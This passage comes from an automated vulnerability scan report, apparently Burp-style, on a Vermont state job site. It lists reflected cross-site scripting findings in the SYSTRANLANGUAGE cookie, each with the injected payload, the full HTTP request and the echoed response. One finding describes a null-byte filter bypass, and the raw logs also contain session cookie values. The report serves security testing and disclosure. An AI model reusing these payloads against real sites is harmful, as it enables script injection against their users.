<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN9E2B8";ALERT(1)//FA1BC80A5C3\">
...[SNIP]...

3.213. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_protectyourself_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d3d"><img%20src%3da%20onerror%3dalert(1)>ac1fe6ffbf1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as f9d3d"><img src=a onerror=alert(1)>ac1fe6ffbf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enf9d3d"><img%20src%3da%20onerror%3dalert(1)>ac1fe6ffbf1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:20:02 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enf9d3d"><img src=a onerror=alert(1)>ac1fe6ffbf1">
...[SNIP]...

3.214. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_quicksearch_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86c8d"%3balert(1)//334fa293da7 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 86c8d";alert(1)//334fa293da7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_quicksearch_dsp.cfm?type=e&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en86c8d"%3balert(1)//334fa293da7; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 01:36:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN86C8D";ALERT(1)//334FA293DA7\">
...[SNIP]...

3.215. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_quicksearch_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload decca"><img%20src%3da%20onerror%3dalert(1)>0dfd472147 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as decca"><img src=a onerror=alert(1)>0dfd472147 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_quicksearch_dsp.cfm?type=e&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=endecca"><img%20src%3da%20onerror%3dalert(1)>0dfd472147; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:21:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="endecca"><img src=a onerror=alert(1)>0dfd472147">
...[SNIP]...

3.216. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_quicksearch_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2e6"%3balert(1)//f30b745f3f1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2e2e6";alert(1)//f30b745f3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_quicksearch_dsp.cfm?type=e&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en2e2e6"%3balert(1)//f30b745f3f1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:22:15 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2E2E6";ALERT(1)//F30B745F3F1\">
...[SNIP]...

3.217. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad224"><img%20src%3da%20onerror%3dalert(1)>cde72d257de was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ad224"><img src=a onerror=alert(1)>cde72d257de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_registration_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=enad224"><img%20src%3da%20onerror%3dalert(1)>cde72d257de; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:14:56'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enad224"><img src=a onerror=alert(1)>cde72d257de">
...[SNIP]...

3.218. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ecf6"%3balert(1)//f0243477b7 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6ecf6";alert(1)//f0243477b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_registration_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en6ecf6"%3balert(1)//f0243477b7; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:06 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:15:05'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN6ECF6";ALERT(1)//F0243477B7\">
...[SNIP]...

3.219. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e15f"><img%20src%3da%20onerror%3dalert(1)>0848adce34d was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7e15f"><img src=a onerror=alert(1)>0848adce34d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en7e15f"><img%20src%3da%20onerror%3dalert(1)>0848adce34d; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:15:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Expires: {ts '2011-04-29 17:15:53'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en7e15f"><img src=a onerror=alert(1)>0848adce34d">
...[SNIP]...

3.220. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm [SYSTRANLANGUAGE cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87b2f"%3balert(1)//9062e32d47a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 87b2f";alert(1)//9062e32d47a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en87b2f"%3balert(1)//9062e32d47a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:16:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
